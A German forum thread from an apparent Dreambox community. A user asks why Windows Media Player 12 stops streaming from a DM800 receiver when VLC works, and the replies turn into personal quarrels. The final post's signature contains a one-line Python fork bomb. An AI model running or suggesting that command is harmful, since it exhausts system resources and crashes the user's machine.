WMP 12 versus VLC (unter 64-bit) LAN

• WMP 12 versus VLC (unter 64-bit) LAN

vorweg: Stream mit VLC 1.1.0 auch HD Vollbild in beide Richtungen im LAN kein Problem, bestens! (DM800, Image 2.8.4)

Neugierde - warum geschieht folgendes:
    WMP12 braucht ungestört etwa 10(!) Min., um seinen Streampuffer scheinbar vollzuschreiben (die %-Anzeige steigt sehr langsam) - früherer Wiedergabestart startet den Stream aber trotzdem - in aller Regel hört der WMP hingegen nach spätestens etwa 90 Min. generell auf, zu streamen - unter 32-bit und auf anderer Hardware gleiches Ergebnis.

Nachtrag:
    Nach längerem Beobachten der Prozessorlast (immer um die 80%) könnte auch das System überfordert sein? Warum aber bei VLC nicht? Merkwürdig!

Unqualifizierte oder emotionale Hinweise bitte vermeiden, ich liebe MS auch nicht - suche aber nach Erklärungen, warum es n i c h t geht, um Streamprobleme besser begreifen zu können.

Bemerkungen von Board-Bull-Terriern sind auch nicht so sonderlich hilfreich; wenn möglich, verkneifen!

Wie immer Dank an alle, die sich mitmühen!

Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von xyheinrich ()

• Hi, kati - mehr Smileys und weniger Buchstaben wären besser gewesen. Laß lieber andere! Trotzdem Danke.

Nachtrag:
    Eben sehe ich einen weiteren wertvollen Beitrag Deinerseits; Du bist ja richtig klasse!
    Bilder
    • Demo.png

8,08 kB, 528×186, 1.221 mal angesehen

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von xyheinrich ()

• :stop: und nun back2topic bitte, Kinderkram braucht es hier nicht auch noch. Danke:peace:
    Gruss Grillehirni 8)
  • @xyheinrich

Was genau war in deinem 2. Post qualifiziert und/oder emotionslos? Wenn du schon Forderungen an das Verhalten anderer stellst, solltest du dich auch selber dran halten.

Ich schätze mal stark, dass du in anderen Boards ähnliche Reaktionen hervorrufst und wolltest gleich mal vorbeugen. Hast du schon mal daran gedacht, dass die Art der Reaktionen eine unmittelbare Folge deines Auftretens sein könnten?
    Eigener erster (leider einziger) Denkansatz ...;)

Und was genau veranlasst dich zur Vermutung, dass es am Image liegen könnte? Nur weil bei dir der Stream mit dem Mediaplayer nicht abbruchfrei funktioniert, heisst noch lange nicht, dass es generell so ist und bei allen Usern auftritt. Wenn es mit VLC klappt und mit WMP nicht: Welchen Schluss könnte man noch ziehen, ausser dass es am Image liegt? Ich bin mir sicher, mit ein wenig Anstrengung findest du einen 2. Denkansatz ;)

Eine Frage in die Runde, ob das Problem auch bei anderen auftritt, hätte dich vielleicht ein Stück weitergebracht. Unter Umständen auch die Nennung deiner Hardware- und Netzwerkkonstellation.

Ich habe mal extra nur für dich den WMP unter W7 x64 laufen lassen. Nach über 4 Stunden lief´s immer noch. Kann das Problem leider nicht reproduzieren.

Deine Streaming Probleme sind wohl eher hausgemacht
    Bilder
    • WMP.jpg

173,35 kB, 656×518, 1.206 mal angesehen
    Gruß Fred

Die Dreambox ist tot, es lebe die Dreambox

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Fred Bogus Trumper ()

• Die Probleme von xyheinrich scheinen alle hausgemacht zu sein, was man an seiner ueberheblichen Art sehr schoen sehen kann.
    Wer Ihn dann auch einmal per PN erlebt hat weiss was ich meine, da kann er seinen Larry noch besser raushaengen lassen und mit seinen Titeln angeben!
    M.E. koennen wir auf solche nur Unruhe bringenden, Unfriede stiftenden und unqualifizierten Teilnehmer in diesem Forum gerne verzichten!

P.S.: Da das hier erneut zu nichts fuehrt, bin ich geneigt diesen Thread ebenfalls zu schliessen, aber xyzheinrich hat bestimmt noch 'nen schlauen Kommentar. Wir sind bestimmt alle boese und er ist das arme Opfer. lol

P.P.S.: Erfreut Euch lieber am neuen Newnigma² Image 3.0.1! Release zum 3jahrigen Geburtstag heute. :)
    "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
  • Original von xyheinrich
    Hi, kati - mehr Smileys und weniger Buchstaben wären besser gewesen. Laß lieber andere! Trotzdem Danke.

Nachtrag:
    Eben sehe ich einen weiteren wertvollen Beitrag Deinerseits; Du bist ja richtig klasse!

Die werthaltigkeit deines beitrages erschließt sich außer dir keinem soviel zu Thema

P.S ich mach das jetzt zu :P :P :P :P :P
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !